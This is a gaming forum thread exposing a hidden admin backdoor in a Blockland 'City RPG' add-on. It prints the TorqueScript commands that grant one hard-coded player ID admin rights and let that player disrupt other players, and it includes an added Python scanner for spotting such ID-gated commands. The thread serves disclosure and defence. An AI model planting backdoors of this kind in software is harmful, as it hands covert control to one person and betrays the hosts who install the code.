Author Topic: City RPG, the new way to achieve admin

Yes, countless times City RPG has been posted, and just recently, JJstorm has released his own City RPG. Yay!
He claims it's different, but what is? Maybe the only thing that has been changed to change game experience is in the common.cs file. Wait, were the other City RPGs posted that were claimed to be posted different when only the common.cs file was changed? Why common.cs?

When the original City RPG was released by Iban, it may or may not have contained the Administration exploit, although I do not know entirely if Iban implanted an Administration exploit or if someone else took it and wrote the exploit.

This is getting very old. Every City RPG you see posted likely contains the Administration exploit specifically written so only the poster's BL ID can activate it, or else the script will just write some random crap.

So, about the exploit; JJstorm's topic ( http://forum.blockland.us/index.php?topic=140531.0 ) posted the link to the City RPG add-on.
I happen to know what to look for when finding the exploit, and when doing so, I succeeded:
The code is written under the "Section 7 : Misc. stuff Functions" in common.cs. This is where the unwanted/useless code is kept, thanks to the person who wrote the admin exploit for being so well organized and easy to find.

This is the code, including the payload after the exploit has allowed the user to obtain admin:
Code: (common.cs)

    function serverCmdclaimAdmin(%client)
    {
        if(%client.bl_id == 1811)
        {
            %client.isAdmin = (%client.isAdmin ? 0 : 1);
            %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
            commandtoclient(%client, 'setAdminLevel', %client.isSuperAdmin);
            messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

            if(%client.isAdmin)
            {
                messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
            }
            else
            {
                messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
            }
        }
        else
        {
            warn(%client.name @ "just tried to be an admin! (BL_ID: " @ %client.bl_id @ ")");
        }
    }

    function serverCmdfakeAdmin(%subClient, %name)
    {
        if(%client.bl_id == 1811 && findClientByName(%name))
        {
            %client = findClientByName(%name);
            %client.fakeAdmin = true;
            commandtoclient(%client, 'setAdminLevel', 1);
            messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, 1, 1);
            messageAll('MsgAdminForce','\c2%1 has become Super Admin. (Manual)', %client.name);
        }
    }

    function serverCmdkickall(%client)
    {
        if(%client.bl_id == 1811) {
            for(%a = 0; %a < ClientGroup.getCount(); %a++)
            {
                %subClient = ClientGroup.getObject(%a);
                if(%subClient.fakeAdmin) %subClient.delete("Server has just been hacked.");
            }
        }
    }

As you can see, the person with the BL ID 1811, which would be JJstorm, is able to use the exploit and payload.
1. The command /claimadmin will allow the user with BL ID 1811 to activate the event, thus resulting in BL ID 1811, JJstorm, becoming admin. If the user, however, is not BL ID 1811, a chat message appears with "[Username here] just tried to be admin!".

2. The command /fakeadmin is not fake, but does the same as the /claimadmin command, although it applies the variable "fakeadmin", allowing the "kickall" payload to display an extra chat message. Upon use, this command displays the chat message: "JJstorm has become Super Admin. (Manual)" or whatever JJstorm has set his username to, making it appear that an Admin has given him Super Admin or that the server got "hacked".

3. The command /kickall says it itself, except the players don't leave. This allows JJstorm to release the payload to delete all of the players' objects. When a player's object is deleted, it makes a "glitchy screen" effect. Last and least, the payload writes a chat message displaying "Server has just been hacked.", and the message is false: the server has not been hacked, rather, the server is being exploited.

I posted this to explain why City RPG has failed and why it will remain failed, and also to inform of the dangers that may result on your server (e.g. clear all bricks).

Discuss.
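
For server hosts who want to check an add-on before loading it, the pattern described in the post above (a `serverCmd` function gated on one hard-coded BL_ID) can be searched for mechanically. This is an added example, not part of the original post or of any City RPG release; the names `audit` and `function_body` are hypothetical, and the sample input is a trimmed, constructed copy of the snippet quoted above.

```python
import re

# Constructed sample, trimmed from the common.cs snippet quoted in the post.
SAMPLE = r"""
function serverCmdclaimAdmin(%client)
{
if(%client.bl_id == 1811)
{
%client.isAdmin = (%client.isAdmin ? 0 : 1);
commandtoclient(%client, 'setAdminLevel', %client.isSuperAdmin);
}
}
function serverCmdkickall(%client)
{
if(%client.bl_id == 1811) { %subClient.delete("Server has just been hacked."); }
}
function serverCmdhelp(%client) { messageClient(%client, '', "Type /stats"); }
"""

# TorqueScript is case-insensitive, so every pattern uses re.I.
FUNC_RE = re.compile(r'function\s+(serverCmd\w+)\s*\([^)]*\)\s*\{', re.I)
ID_GATE_RE = re.compile(r'\.bl_id\s*(?:==|\$=)\s*"?(\d+)"?', re.I)
PRIV_RE = re.compile(r'\.isAdmin\s*=[^=]|\.isSuperAdmin\s*=[^=]|setAdminLevel', re.I)

def function_body(src, open_brace):
    """Return the text between the brace at open_brace and its matching close.
    Braces inside string literals are not special-cased (assumed rare)."""
    depth = 0
    for i in range(open_brace, len(src)):
        if src[i] == '{':
            depth += 1
        elif src[i] == '}':
            depth -= 1
            if depth == 0:
                return src[open_brace + 1:i]
    return src[open_brace + 1:]  # unbalanced file: scan to the end

def audit(src):
    """List client-callable commands whose body compares bl_id to a literal."""
    findings = []
    for m in FUNC_RE.finditer(src):
        body = function_body(src, m.end() - 1)
        ids = sorted({int(x) for x in ID_GATE_RE.findall(body)})
        if ids:
            findings.append({"command": m.group(1), "bl_ids": ids,
                             "touches_admin": bool(PRIV_RE.search(body))})
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A hit is a prompt to read the function, not proof of a backdoor; a changed ID, as mentioned later in this thread, is still flagged because the check keys on the comparison rather than on 1811.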

you mean reasons not to use it OTHER than the mod sucks ass?

if people still wanted to be lame and use it, they could just ban ID 1811

It seems that JJstorm crawls for admin on every single server.
Oh wow, I respected him.

So THAT'S the exploit all the other guys were talking about. If I host a cityRPG, I would ban that guy from my server.

Thank you for showing me that :/

Wait wait wait, this ID was totally different when I found it. What an exploit, people could be forwarding this all over the internet. Although, it's not like a virus or anything, I just changed it to my ID instead :3

you mean reasons not to use it OTHER than the mod sucks ass?

if people still wanted to be lame and use it, they could just ban ID 1811
Or just move the code entirely.
If an administrator on your server un-bans JJstorm with City RPG, the payload can be used.
If the code is moved entirely, there is a 0 chance that JJstorm can ruin the server with the script.

Wait wait wait, this ID was totally different when I found it. What an exploit, people could be forwarding this all over the internet. Although, it's not like a virus or anything, I just changed it to my ID instead :3
You downloaded and edited the script to your ID when you're going to be the host? If so, god you're a loving idiot.

Or just move the code entirely.
If an administrator on your server un-bans JJstorm with City RPG, the payload can be used.
If the code is moved entirely, there is a 0 chance that JJstorm can ruin the server with the script.
You downloaded and edited the script to your ID when you're going to be the host? If so, god you're a loving idiot.
You're a loving moron, I changed it to my ID so then that ID wouldn't come on and get admin. I'm not going to loving release my version, so shut the hell up. Jesus Christ.

You're a loving moron, I changed it to my ID so then that ID wouldn't come on and get admin. I'm not going to loving release my version, so shut the hell up. Jesus Christ.
Plus, I read the script, and I have to say that command to actually use it. For now, it's basically de-activated until I can remove it.

You're a loving moron, I changed it to my ID so then that ID wouldn't come on and get admin. I'm not going to loving release my version, so shut the hell up. Jesus Christ.
What's with the sudden outburst?

Plus, I read the script, and I have to say that command to actually use it. For now, it's basically de-activated until I can remove it.
It's only a couple of lines. Why not remove it now? It won't take long :U

What's with the sudden outburst?
It's only a couple of lines. Why not remove it now? It won't take long :U
Hormones. And the fact that you called me a loving idiot as well. Sorry :/

Hormones. And the fact that you called me a loving idiot as well. Sorry :/

YOU'RE A loving WORTHLESS monday oh whoops my hormones sorry kbro

YOU'RE A loving WORTHLESS monday oh whoops my hormones sorry kbro
ONLY MANLY MEN HAVE HORMONES FOOL

Hormones. And the fact that you called me a loving idiot as well. Sorry :/
You downloaded and edited the script to your ID when you're going to be the host? If so, god you're a loving idiot.
IIIIFFFF

[poorexcuse]
This was meant to be used ONLY to help out first timers. I only use it after I have permission to be admin on a server. This will be removed in v2.
[/poorexcuse]